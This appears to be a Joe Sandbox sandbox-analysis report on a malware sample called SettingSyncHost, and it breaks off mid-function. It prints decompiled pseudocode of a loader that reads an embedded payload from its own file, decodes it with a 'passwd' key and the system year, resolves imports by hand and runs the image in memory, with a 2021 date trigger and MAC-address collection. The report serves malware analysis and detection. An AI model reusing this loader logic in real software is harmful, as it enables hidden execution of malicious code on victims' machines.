Associated: 00000004.00000002.1300725591.0000000000F90000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.1300746726.0000000000F91000.00000020.00020000.sdmp Download File
Associated: 00000004.00000002.1300850176.0000000000FBB000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.1300877417.0000000000FC5000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.1300893530.0000000000FC7000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.1301073357.00000000010EE000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.1301085124.00000000010F0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.1301106256.00000000010F1000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f90000_SettingSyncHost.jbxd

Similarity

API ID: Find$File$Next$CloseFirst
String ID: 0
API String ID: 1884811643-4108050209
Opcode ID: 43f0bbafb174b48677a30963af1cad0de8a02117d02e2674e182f9349d3d7ee9
Instruction ID: 438c544f39dc75b194e0b115d8847a3126aba501a734b383b19e9d41cb12b5ae
Opcode Fuzzy Hash: 43f0bbafb174b48677a30963af1cad0de8a02117d02e2674e182f9349d3d7ee9
Instruction Fuzzy Hash: 28C19971D0121A8FEB24DF54CE49BEEBBB5EF44314F208298E40867281DB75AE85DF90

Uniqueness

Uniqueness Score: -1.00%

Function 00FCBB10, Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 251
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetAdaptersInfo.IPHLPAPI(00000000,00000288), ref: 00FCBBEB

Strings

%02X%02X%02X%02X%02X%02X, xrefs: 00FCBC98

Memory Dump Source

Source File: 00000004.00000002.1300907437.0000000000FC8000.00000040.00020000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000004.00000002.1300725591.0000000000F90000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.1300746726.0000000000F91000.00000020.00020000.sdmp Download File
Associated: 00000004.00000002.1300850176.0000000000FBB000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.1300877417.0000000000FC5000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.1300893530.0000000000FC7000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.1301073357.00000000010EE000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.1301085124.00000000010F0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.1301106256.00000000010F1000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f90000_SettingSyncHost.jbxd

Similarity

API ID: AdaptersInfo
String ID: %02X%02X%02X%02X%02X%02X
API String ID: 3177971545-722279150
Opcode ID: 0c86cb92f31c08e4413eb0d5b17ac668fd405b144cec6b34b0a64fbf1e827ec5
Instruction ID: f5d89b64ff76c8eceae1985ebe2a132708d76c3fbd7160d81a853455c198c868
Opcode Fuzzy Hash: 0c86cb92f31c08e4413eb0d5b17ac668fd405b144cec6b34b0a64fbf1e827ec5
Instruction Fuzzy Hash: 8FA1E270D0025A9FDB25DB24CD46FEEBBB5AF45300F0481E9E549A7281DB789E84EF90

Uniqueness

Uniqueness Score: -1.00%

Function 00F91070, Relevance: 4.6, APIs: 3, Instructions: 103
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00F91070(void* __ebx, void* __edi, void* __esi, intOrPtr _a4) {
				void* _v12;
				signed int* _v24;
				intOrPtr _v48;
				intOrPtr* _v60;
				struct HINSTANCE__* _v72;
				void _v268;
				struct HINSTANCE__* _t55;
				_Unknown_base(*)()* _t65;
				_Unknown_base(*)()* _t72;
				void* _t105;
				void* _t106;
				void* _t107;

				memset( &_v268, 0xcccccccc, 0x42 << 2);
				_t107 = _t106 + 0xc;
				_t5 = _a4 + 0x3c; // 0x3ca104c4
				_v48 = _a4 +  *_t5;
				_v60 = _a4 +  *((intOrPtr*)(_v48 + 0x80));
				_t52 = _v60;
				if(_v60 != _a4) {
					while(1) {
						_t52 = _v60;
						__eflags =  *(_v60 + 0xc);
						if(__eflags == 0) {
							break;
						}
						_t55 = LoadLibraryA(_a4 +  *(_v60 + 0xc)); // executed
						__eflags = _t107 - _t107;
						_v72 = E00F931A1(_t55, _t107 - _t107);
						__eflags = _v72;
						if(__eflags != 0) {
							_v12 = _a4 +  *((intOrPtr*)(_v60 + 0x10));
							_v24 = _a4 +  *_v60;
							__eflags = _v24 - _a4;
							if(_v24 == _a4) {
								_v24 = _v12;
							}
							while(1) {
								__eflags =  *_v24;
								if( *_v24 == 0) {
									break;
								}
								__eflags =  *_v24 & 0x80000000;
								if(( *_v24 & 0x80000000) == 0) {
									_t65 = GetProcAddress(_v72, _a4 +  *_v24 + 2);
									__eflags = _t107 - _t107;
									 *_v12 = E00F931A1(_t65, _t107 - _t107);
								} else {
									_t72 = GetProcAddress(_v72,  *_v24 & 0x0000ffff);
									__eflags = _t107 - _t107;
									 *_v12 = E00F931A1(_t72, _t107 - _t107);
								}
								_v12 = _v12 + 4;
								_v24 =  &(_v24[1]);
							}
							_v60 = _v60 + 0x14;
							continue;
						}
						break;
					}
					L13:
					return E00F931A1(_t52, _t105 - _t107 + 0x108);
				}
				goto L13;
			}

0x00f9108c
0x00f9108c
0x00f91094
0x00f91097
0x00f910a6
0x00f910a9
0x00f910af
0x00f910b6
0x00f910b6
0x00f910b9
0x00f910bd
0x00000000
0x00000000
0x00f910cf
0x00f910d5
0x00f910dc
0x00f910df
0x00f910e3
0x00f910f3
0x00f910fe
0x00f91104
0x00f91107
0x00f9110c
0x00f9110c
0x00f9110f
0x00f91112
0x00f91115
0x00000000
0x00000000
0x00f9111c
0x00f91122
0x00f9115d
0x00f91163
0x00f9116d
0x00f91124
0x00f91136
0x00f9113c
0x00f91146
0x00f91146
0x00f91175
0x00f9117e
0x00f9117e
0x00f91189
0x00000000
0x00f91189
0x00000000
0x00f910e5
0x00f91194
0x00f911a4
0x00f911a4
0x00000000

APIs

LoadLibraryA.KERNELBASE(00000000), ref: 00F910CF

Memory Dump Source

Source File: 00000004.00000002.1300746726.0000000000F91000.00000020.00020000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000004.00000002.1300725591.0000000000F90000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.1300850176.0000000000FBB000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.1300877417.0000000000FC5000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.1300893530.0000000000FC7000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.1300907437.0000000000FC8000.00000040.00020000.sdmp Download File
Associated: 00000004.00000002.1301073357.00000000010EE000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.1301085124.00000000010F0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.1301106256.00000000010F1000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f90000_SettingSyncHost.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: ef1e85eaa01d0df9ee02b51c93e7a51e57e6666760b7381c05730e6dfaff534d
Instruction ID: 6f70e11652df5e2988051be8b0a09b3ab5842cf98384cd049d35cb786519058d
Opcode Fuzzy Hash: ef1e85eaa01d0df9ee02b51c93e7a51e57e6666760b7381c05730e6dfaff534d
Instruction Fuzzy Hash: AC412B75E00209EFDF54DF98D881AADBBB6FF48324F104069E946AB351C734AE80DB91

Uniqueness

Uniqueness Score: -1.00%

Function 00F930E0, Relevance: 3.0, APIs: 2, Instructions: 43
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 79%

			E00F930E0(intOrPtr __ebx, void* __edx, void* __edi, void* __esi) {
				signed int _v8;
				struct _SYSTEMTIME _v28;
				char _v224;
				signed int _t9;
				intOrPtr _t16;
				void* _t26;
				intOrPtr _t28;
				void* _t30;
				intOrPtr _t31;
				signed int _t34;
				void* _t35;

				_t26 = __edx;
				_t20 = __ebx;
				_t30 =  &_v224;
				memset(_t30, 0xcccccccc, 0x37 << 2);
				_t36 = _t35 + 0xc;
				_t31 = _t30 + 0x37;
				_t9 =  *0xfc7040; // 0xbb40e64e
				_v8 = _t9 ^ _t34;
				_t33 = _t35 + 0xc;
				GetLocalTime( &_v28);
				E00F931A1( &_v28, _t35 + 0xc - _t36);
				if((_v28.wYear & 0x0000ffff) == 0x7e5) {
					L00F91014(__ebx, _t26, _t31, _t33); // executed
				}
				_push(0);
				E00F931C4(0xf9315c);
				_pop(_t16);
				_t28 = _t26;
				return E00F931A1(E00F93C21(_t16, _t20, _v8 ^ _t34, _t28, _t31, _t33), _t34 - _t36 + 0xdc);
			}

0x00f930e0
0x00f930e0
0x00f930ec
0x00f930fc
0x00f930fc
0x00f930fc
0x00f930fe
0x00f93105
0x00f93108
0x00f9310e
0x00f93116
0x00f93124
0x00f93126
0x00f93126
0x00f93130
0x00f93137
0x00f9313c
0x00f9313d
0x00f9315b

APIs

GetLocalTime.KERNEL32(?), ref: 00F9310E
@_RTC_CheckStackVars@8.LIBCMT ref: 00F93137

Memory Dump Source

Source File: 00000004.00000002.1300746726.0000000000F91000.00000020.00020000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000004.00000002.1300725591.0000000000F90000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.1300850176.0000000000FBB000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.1300877417.0000000000FC5000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.1300893530.0000000000FC7000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.1300907437.0000000000FC8000.00000040.00020000.sdmp Download File
Associated: 00000004.00000002.1301073357.00000000010EE000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.1301085124.00000000010F0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.1301106256.00000000010F1000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f90000_SettingSyncHost.jbxd

Similarity

API ID: CheckLocalStackTimeVars@8
String ID:
API String ID: 1854921025-0
Opcode ID: 05cca99bba58ef1679b04d87f40ac59b98cea3bdfa4c63cef06b15dca036392c
Instruction ID: 67d38e9cb0f095019a2ea45bf7050026a7d119703af2d15161d3535ed70fbbfd
Opcode Fuzzy Hash: 05cca99bba58ef1679b04d87f40ac59b98cea3bdfa4c63cef06b15dca036392c
Instruction Fuzzy Hash: DEF0A972E041085AFB60F7A9EC42AAEB7A9DB84311F500077E909E3251E9295E84D6E1

Uniqueness

Uniqueness Score: -1.00%

Function 00F92A00, Relevance: 38.9, APIs: 19, Strings: 3, Instructions: 383
filememorytimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 46%

			E00F92A00(void* __ebx, void* __edx, void* __edi, void* __esi) {
				void _v196;
				void* __ebp;
				void* _t18;
				void* _t24;
				void* _t28;
				void* _t34;
				long _t35;
				void* _t41;
				long _t43;
				int _t44;
				void* _t50;
				void* _t60;
				void* _t72;
				void* _t73;
				void* _t75;
				void* _t88;
				intOrPtr _t94;
				intOrPtr _t111;
				intOrPtr _t113;
				void* _t114;
				void* _t119;
				void* _t121;
				void* _t123;
				void* _t131;
				void* _t132;
				void* _t135;
				void* _t136;
				void* _t157;
				void* _t158;
				long long* _t160;
				void* _t161;
				long long* _t162;
				void* _t163;
				long long* _t164;
				void* _t165;
				long long* _t166;
				void* _t167;
				long long* _t168;
				void* _t169;
				long long* _t170;
				long long* _t172;
				long long* _t175;
				void* _t176;
				long long* _t177;
				long long* _t179;
				void* _t181;
				long long* _t183;
				void* _t184;
				long long* _t185;
				long long* _t188;
				long long* _t191;
				long long* _t194;
				long long* _t197;
				void* _t199;
				long long _t222;
				long long _t223;
				long long _t224;
				long long _t225;
				long long _t226;
				long long _t227;
				long long _t228;
				long long _t229;
				long long _t230;
				long long _t231;
				long long _t232;
				long long _t233;
				long long _t234;
				long long _t235;
				long long _t236;
				long long _t237;

				_t135 = __edx;
				_t128 = __ebx;
				memset( &_v196, 0xcccccccc, 0x30 << 2);
				_t160 = _t158 + 0xc - 8;
				_t222 =  *0xfbbc50;
				 *_t160 = _t222;
				E00F93700(_t135);
				 *_t160 = _t222;
				E00F935B0(_t135);
				 *_t160 = _t222;
				E00F93460(_t135);
				 *_t160 = _t222;
				E00F93340();
				st0 = _t222;
				_t161 = _t160 + 8;
				E00F931A1(GetModuleFileNameW(E00F931A1(GetModuleHandleW(0), _t161 - _t161), "C:\Users\Public\SettingSyncHost", 0x208), _t161 - _t161);
				_t162 = _t161 - 8;
				_t223 =  *0xfbbc50;
				 *_t162 = _t223;
				E00F93700(_t135);
				 *_t162 = _t223;
				E00F935B0(_t135);
				 *_t162 = _t223;
				E00F93460(_t135);
				 *_t162 = _t223;
				E00F93340();
				st0 = _t223;
				_t163 = _t162 + 8;
				_t18 = CreateFileW("C:\Users\Public\SettingSyncHost", 0x80000000, 3, 0, 3, 0, 0); // executed
				 *0x10ee604 = E00F931A1(_t18, _t163 - _t163);
				_t164 = _t163 - 8;
				_t224 =  *0xfbbc50;
				 *_t164 = _t224;
				E00F93700(_t135);
				 *_t164 = _t224;
				E00F935B0(_t135);
				 *_t164 = _t224;
				E00F93460(_t135);
				 *_t164 = _t224;
				E00F93340();
				st0 = _t224;
				_t165 = _t164 + 8;
				_t24 =  *0x10ee604; // 0xc8
				_t28 = GlobalAlloc(0, E00F931A1(GetFileSize(_t24, 0), _t165 - _t165) + 0x2710); // executed
				 *0x10ee5b0 = E00F931A1(_t28, _t165 - _t165);
				_t166 = _t165 - 8;
				_t225 =  *0xfbbc50;
				 *_t166 = _t225;
				E00F93700(_t135);
				 *_t166 = _t225;
				E00F935B0(_t135);
				 *_t166 = _t225;
				E00F93460(_t135);
				 *_t166 = _t225;
				E00F93340();
				st0 = _t225;
				_t167 = _t166 + 8;
				_t34 =  *0x10ee604; // 0xc8
				_t35 = SetFilePointer(_t34, 0, 0, 0); // executed
				E00F931A1(_t35, _t167 - _t167);
				_t168 = _t167 - 8;
				_t226 =  *0xfbbc50;
				 *_t168 = _t226;
				E00F93700(_t135);
				 *_t168 = _t226;
				E00F935B0(_t135);
				 *_t168 = _t226;
				E00F93460(_t135);
				 *_t168 = _t226;
				E00F93340();
				st0 = _t226;
				_t169 = _t168 + 8;
				_t141 = _t169;
				_t41 =  *0x10ee604; // 0xc8
				_t43 = E00F931A1(GetFileSize(_t41, 0), _t169 - _t169);
				_t131 =  *0x10ee5b0; // 0xdfbc20
				_t136 =  *0x10ee604; // 0xc8
				_t44 = ReadFile(_t136, _t131, _t43, 0x10ee850, 0); // executed
				E00F931A1(_t44, _t169 - _t169);
				_t170 = _t169 - 8;
				_t227 =  *0xfbbc50;
				 *_t170 = _t227;
				E00F93700(_t136);
				 *_t170 = _t227;
				E00F935B0(_t136);
				 *_t170 = _t227;
				E00F93460(_t136);
				 *_t170 = _t227;
				E00F93340();
				st0 = _t227;
				_t50 =  *0x10ee5b0; // 0xdfbc20
				 *0x10ee5b0 = _t50 + 0x3ac00;
				_t172 = _t170 + 8 - 8;
				_t228 =  *0xfbbc50;
				 *_t172 = _t228;
				E00F93700(_t136);
				 *_t172 = _t228;
				E00F935B0(_t136);
				 *_t172 = _t228;
				E00F93460(_t136);
				 *_t172 = _t228;
				E00F93340();
				st0 = _t228;
				E00F94F30("passwd", "aasswd");
				_t175 = _t172 + 0x10 - 8;
				_t229 =  *0xfbbc50;
				 *_t175 = _t229;
				E00F93700(_t136);
				 *_t175 = _t229;
				E00F935B0(_t136);
				 *_t175 = _t229;
				E00F93460(_t136);
				 *_t175 = _t229;
				_t60 = E00F93340();
				st0 = _t229;
				_t176 = _t175 + 8;
				GetSystemTime(0x10ee610);
				E00F931A1(_t60, _t176 - _t176);
				_t177 = _t176 - 8;
				_t230 =  *0xfbbc50;
				 *_t177 = _t230;
				E00F93700(_t136);
				 *_t177 = _t230;
				E00F935B0(_t136);
				 *_t177 = _t230;
				E00F93460(_t136);
				 *_t177 = _t230;
				E00F93340();
				st0 = _t230;
				 *0x10ee5e0 = 0x10ee610->wYear & 0x0000ffff ^ 0x00000795;
				_t179 = _t177 + 8 - 8;
				_t231 =  *0xfbbc50;
				 *_t179 = _t231;
				E00F93700(_t136);
				 *_t179 = _t231;
				E00F935B0(_t136);
				 *_t179 = _t231;
				E00F93460(_t136);
				 *_t179 = _t231;
				E00F93340();
				st0 = _t231;
				_t72 = E00F94EA0("passwd");
				_t181 = _t179 + 0xc;
				_t73 =  *0x10ee604; // 0xc8
				_t75 = E00F931A1(GetFileSize(_t73, 0), _t181 - _t181);
				_t132 =  *0x10ee5b0; // 0xdfbc20
				L00F9101E(__ebx, _t169, _t181, _t132, _t75 - 0x3ac00, "passwd", _t72);
				_t183 = _t181 + 0x10 - 8;
				_t232 =  *0xfbbc50;
				 *_t183 = _t232;
				E00F93700(_t136);
				 *_t183 = _t232;
				E00F935B0(_t136);
				 *_t183 = _t232;
				E00F93460(_t136);
				 *_t183 = _t232;
				E00F93340();
				st0 = _t232;
				_t184 = _t183 + 8;
				_t151 = _t184;
				 *0x10ee5b8 = E00F931A1(GetModuleHandleA(0), _t184 - _t184);
				_t185 = _t184 - 8;
				_t233 =  *0xfbbc50;
				 *_t185 = _t233;
				E00F93700(_t136);
				 *_t185 = _t233;
				E00F935B0(_t136);
				 *_t185 = _t233;
				E00F93460(_t136);
				 *_t185 = _t233;
				E00F93340();
				st0 = _t233;
				_t88 =  *0x10ee5b0; // 0xdfbc20
				L00F91032(__ebx, _t136, _t169, _t184, _t88); // executed
				_t188 = _t185 + 0xc - 8;
				_t234 =  *0xfbbc50;
				 *_t188 = _t234;
				E00F93700(_t136);
				 *_t188 = _t234;
				E00F935B0(_t136);
				 *_t188 = _t234;
				E00F93460(_t136);
				 *_t188 = _t234;
				E00F93340();
				st0 = _t234;
				_t94 =  *0x10ee5b8; // 0xf90000
				L00F9100A(__ebx, _t136, _t141, _t184, 0xfc8900, _t94);
				_t191 = _t188 + 0x10 - 8;
				_t235 =  *0xfbbc50;
				 *_t191 = _t235;
				E00F93700(_t136);
				 *_t191 = _t235;
				E00F935B0(_t136);
				 *_t191 = _t235;
				E00F93460(_t136);
				 *_t191 = _t235;
				E00F93340();
				st0 = _t235;
				L00F91028(_t128, _t136, _t141, _t151, 0xfc8900); // executed
				_t194 = _t191 + 0xc - 8;
				_t236 =  *0xfbbc50;
				 *_t194 = _t236;
				E00F93700(_t136);
				 *_t194 = _t236;
				E00F935B0(_t136);
				 *_t194 = _t236;
				E00F93460(_t136);
				 *_t194 = _t236;
				E00F93340();
				st0 = _t236;
				L00F91005(_t128, _t141, _t151, 0xfc8900); // executed
				_t197 = _t194 + 0xc - 8;
				_t237 =  *0xfbbc50;
				 *_t197 = _t237;
				E00F93700(_t136);
				 *_t197 = _t237;
				E00F935B0(_t136);
				 *_t197 = _t237;
				E00F93460(_t136);
				 *_t197 = _t237;
				E00F93340();
				st0 = _t237;
				L00F91019(_t128, _t136, _t141, _t151, 0xfc8900);
				_t199 = _t197 + 0xc;
				_t111 =  *0xfc893c; // 0x100
				 *0x10ee600 = _t111 + 0xfc8900;
				_t113 =  *0x10ee600; // 0xfc8a00
				_t3 = _t113 + 0x28; // 0x10be8
				 *0x10ee5b4 =  *_t3 + 0xfc8900;
				_t114 =  *0x10ee5b4(); // executed
				E00F931A1(_t114, _t199 - _t199);
				if(E00F931A1(GetTickCount(), _t199 - _t199) == 0) {
					E00F94E3F(0, 0);
					_t199 = _t199 + 8;
				}
				_t154 = _t199;
				_t119 = E00F931A1(GetTickCount(), _t199 - _t199);
				_t216 = _t119;
				if(_t119 == 0) {
					_push(0);
					E00F94CF3(_t128, _t136, _t141, _t154, _t216);
					_t199 = _t199 + 4;
				}
				_t155 = _t199;
				_t121 = E00F931A1(GetTickCount(), _t199 - _t199);
				_t218 = _t121;
				if(_t121 == 0) {
					_push(0);
					E00F94BA9(_t128, _t136, _t141, _t155, _t218);
					_t199 = _t199 + 4;
				}
				_t156 = _t199;
				_t123 = E00F931A1(GetTickCount(), _t199 - _t199);
				_t220 = _t123;
				if(_t123 == 0) {
					_push(0);
					_push(0);
					_t123 = E00F94A35(_t128, _t141, _t156, _t220);
					_t199 = _t199 + 8;
				}
				return E00F931A1(_t123, _t157 - _t199 + 0xc0);
			}

0x00f92a00
0x00f92a00
0x00f92a1c
0x00f92a1e
0x00f92a21
0x00f92a27
0x00f92a2a
0x00f92a2f
0x00f92a32
0x00f92a37
0x00f92a3a
0x00f92a3f
0x00f92a42
0x00f92a47
0x00f92a49
0x00f92a72
0x00f92a77
0x00f92a7a
0x00f92a80
0x00f92a83
0x00f92a88
0x00f92a8b
0x00f92a90
0x00f92a93
0x00f92a98
0x00f92a9b
0x00f92aa0
0x00f92aa2
0x00f92abb
0x00f92ac8
0x00f92acd
0x00f92ad0
0x00f92ad6
0x00f92ad9
0x00f92ade
0x00f92ae1
0x00f92ae6
0x00f92ae9
0x00f92aee
0x00f92af1
0x00f92af6
0x00f92af8
0x00f92aff
0x00f92b1c
0x00f92b29
0x00f92b2e
0x00f92b31
0x00f92b37
0x00f92b3a
0x00f92b3f
0x00f92b42
0x00f92b47
0x00f92b4a
0x00f92b4f
0x00f92b52
0x00f92b57
0x00f92b59
0x00f92b64
0x00f92b6a
0x00f92b72
0x00f92b77
0x00f92b7a
0x00f92b80
0x00f92b83
0x00f92b88
0x00f92b8b
0x00f92b90
0x00f92b93
0x00f92b98
0x00f92b9b
0x00f92ba0
0x00f92ba2
0x00f92bae
0x00f92bb2
0x00f92bc0
0x00f92bc6
0x00f92bcd
0x00f92bd4
0x00f92bdc
0x00f92be1
0x00f92be4
0x00f92bea
0x00f92bed
0x00f92bf2
0x00f92bf5
0x00f92bfa
0x00f92bfd
0x00f92c02
0x00f92c05
0x00f92c0a
0x00f92c0f
0x00f92c19
0x00f92c1e
0x00f92c21
0x00f92c27
0x00f92c2a
0x00f92c2f
0x00f92c32
0x00f92c37
0x00f92c3a
0x00f92c3f
0x00f92c42
0x00f92c47
0x00f92c56
0x00f92c5e
0x00f92c61
0x00f92c67
0x00f92c6a
0x00f92c6f
0x00f92c72
0x00f92c77
0x00f92c7a
0x00f92c7f
0x00f92c82
0x00f92c87
0x00f92c89
0x00f92c93
0x00f92c9b
0x00f92ca0
0x00f92ca3
0x00f92ca9
0x00f92cac
0x00f92cb1
0x00f92cb4
0x00f92cb9
0x00f92cbc
0x00f92cc1
0x00f92cc4
0x00f92cc9
0x00f92cda
0x00f92cdf
0x00f92ce2
0x00f92ce8
0x00f92ceb
0x00f92cf0
0x00f92cf3
0x00f92cf8
0x00f92cfb
0x00f92d00
0x00f92d03
0x00f92d08
0x00f92d12
0x00f92d17
0x00f92d24
0x00f92d32
0x00f92d3d
0x00f92d44
0x00f92d4c
0x00f92d4f
0x00f92d55
0x00f92d58
0x00f92d5d
0x00f92d60
0x00f92d65
0x00f92d68
0x00f92d6d
0x00f92d70
0x00f92d75
0x00f92d77
0x00f92d7a
0x00f92d8b
0x00f92d90
0x00f92d93
0x00f92d99
0x00f92d9c
0x00f92da1
0x00f92da4
0x00f92da9
0x00f92dac
0x00f92db1
0x00f92db4
0x00f92db9
0x00f92dbe
0x00f92dc4
0x00f92dcc
0x00f92dcf
0x00f92dd5
0x00f92dd8
0x00f92ddd
0x00f92de0
0x00f92de5
0x00f92de8
0x00f92ded
0x00f92df0
0x00f92df5
0x00f92dfa
0x00f92e05
0x00f92e0d
0x00f92e10
0x00f92e16
0x00f92e19
0x00f92e1e
0x00f92e21
0x00f92e26
0x00f92e29
0x00f92e2e
0x00f92e31
0x00f92e36
0x00f92e40
0x00f92e48
0x00f92e4b
0x00f92e51
0x00f92e54
0x00f92e59
0x00f92e5c
0x00f92e61
0x00f92e64
0x00f92e69
0x00f92e6c
0x00f92e71
0x00f92e7b
0x00f92e83
0x00f92e86
0x00f92e8c
0x00f92e8f
0x00f92e94
0x00f92e97
0x00f92e9c
0x00f92e9f
0x00f92ea4
0x00f92ea7
0x00f92eac
0x00f92eb6
0x00f92ebb
0x00f92ebe
0x00f92ec8
0x00f92ecd
0x00f92ed2
0x00f92edb
0x00f92ee3
0x00f92eeb
0x00f92f01
0x00f92f07
0x00f92f0c
0x00f92f0c
0x00f92f0f
0x00f92f19
0x00f92f1e
0x00f92f20
0x00f92f22
0x00f92f24
0x00f92f29
0x00f92f29
0x00f92f2c
0x00f92f36
0x00f92f3b
0x00f92f3d
0x00f92f3f
0x00f92f41
0x00f92f46
0x00f92f46
0x00f92f49
0x00f92f53
0x00f92f58
0x00f92f5a
0x00f92f5c
0x00f92f5e
0x00f92f60
0x00f92f65
0x00f92f65
0x00f92f7b

APIs

GetModuleHandleW.KERNEL32(00000000,C:\Users\Public\SettingSyncHost,00000208), ref: 00F92A5C
GetModuleFileNameW.KERNEL32(00000000), ref: 00F92A6A

Part of subcall function 00F931A1: _RTC_Failure.LIBCMT ref: 00F931B4

CreateFileW.KERNELBASE(C:\Users\Public\SettingSyncHost,80000000,00000003,00000000,00000003,00000000,00000000), ref: 00F92ABB
GetFileSize.KERNEL32(000000C8,00000000), ref: 00F92B05
GlobalAlloc.KERNELBASE(00000000,-00002710), ref: 00F92B1C
SetFilePointer.KERNELBASE(000000C8,00000000,00000000,00000000), ref: 00F92B6A
GetFileSize.KERNEL32(000000C8,00000000,010EE850,00000000), ref: 00F92BB8
ReadFile.KERNELBASE(000000C8,00DFBC20,00000000), ref: 00F92BD4
GetSystemTime.KERNEL32(010EE610), ref: 00F92C93
_strlen.LIBCMT ref: 00F92D12
GetFileSize.KERNEL32(000000C8,00000000,passwd,00000000), ref: 00F92D2A
GetModuleHandleA.KERNEL32(00000000), ref: 00F92D7E
GetTickCount.KERNEL32 ref: 00F92EF2
GetTickCount.KERNEL32 ref: 00F92F11
_perror.LIBCMT ref: 00F92F24
GetTickCount.KERNEL32 ref: 00F92F2E
_wprintf.LIBCMT ref: 00F92F41
GetTickCount.KERNEL32 ref: 00F92F4B
_setlocale.LIBCMT ref: 00F92F60

Part of subcall function 00F94E3F: __wfsopen.LIBCMT ref: 00F94E4C

Strings

C:\Users\Public\SettingSyncHost, xrefs: 00F92A53, 00F92AB6
passwd, xrefs: 00F92C51, 00F92CDA, 00F92D0D, 00F92D1B
aasswd, xrefs: 00F92C4C

Memory Dump Source

Source File: 00000004.00000002.1300746726.0000000000F91000.00000020.00020000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000004.00000002.1300725591.0000000000F90000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.1300850176.0000000000FBB000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.1300877417.0000000000FC5000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.1300893530.0000000000FC7000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.1300907437.0000000000FC8000.00000040.00020000.sdmp Download File
Associated: 00000004.00000002.1301073357.00000000010EE000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.1301085124.00000000010F0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.1301106256.00000000010F1000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f90000_SettingSyncHost.jbxd

Similarity

API ID: File$CountTick$ModuleSize$Handle$AllocCreateFailureGlobalNamePointerReadSystemTime__wfsopen_perror_setlocale_strlen_wprintf
String ID: C:\Users\Public\SettingSyncHost$aasswd$passwd
API String ID: 969942737-4271608098
Opcode ID: 1cc4802d459bca13a482c3826e244b9d5ee41f80ccf0a74801c4d6ffd7e7f9d9
Instruction ID: 2d02d7d28427afbe011ed84bbd5001e83e3e548471a53925613f2a8c9018a26f
Opcode Fuzzy Hash: 1cc4802d459bca13a482c3826e244b9d5ee41f80ccf0a74801c4d6ffd7e7f9d9
Instruction Fuzzy Hash: DAC163B1908509D6FA547B29EC8F61CBFA0EF04B45F0609A4F4C495196EF3E0A28A797

Uniqueness

Uniqueness Score: -1.00%

Function 00F922C0, Relevance: 6.2, APIs: 4, Instructions: 195
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 26%

			E00F922C0(void* __ebx, void* __edx, void* __edi, void* __esi, intOrPtr _a4) {
				intOrPtr _v12;
				signed short _v24;
				signed int _v36;
				long _v48;
				intOrPtr _v60;
				void _v256;
				int _t75;
				void* _t80;
				void* _t82;
				void* _t115;
				long _t118;
				void* _t130;
				void* _t131;
				long long* _t133;
				long long* _t136;
				long long* _t138;
				long long* _t140;
				long long* _t142;
				void* _t143;
				long long* _t144;
				void* _t145;
				long long* _t146;
				long long* _t149;
				long long* _t152;
				long long _t155;
				long long _t156;
				long long _t157;
				long long _t158;
				long long _t159;
				long long _t160;
				long long _t161;
				long long _t162;
				long long _t163;

				_t115 = __edx;
				memset( &_v256, 0xcccccccc, 0x3f << 2);
				_t5 = _a4 + 0x3c; // 0xffe200e8
				_v60 = _a4 +  *_t5;
				_t133 = _t131 + 0xc - 8;
				_t155 =  *0xfbbc50;
				 *_t133 = _t155;
				E00F93700(_t115);
				 *_t133 = _t155;
				E00F935B0(_t115);
				 *_t133 = _t155;
				E00F93460(_t115);
				 *_t133 = _t155;
				E00F93340();
				st0 = _t155;
				_t116 = _a4;
				E00F938C0(0xfc8900, _a4,  *((intOrPtr*)(_v60 + 0x54)));
				_t136 = _t133 + 0x14 - 8;
				_t156 =  *0xfbbc50;
				 *_t136 = _t156;
				E00F93700(_a4);
				 *_t136 = _t156;
				E00F935B0(_a4);
				 *_t136 = _t156;
				E00F93460(_t116);
				 *_t136 = _t156;
				E00F93340();
				st0 = _t156;
				_t117 = _v60;
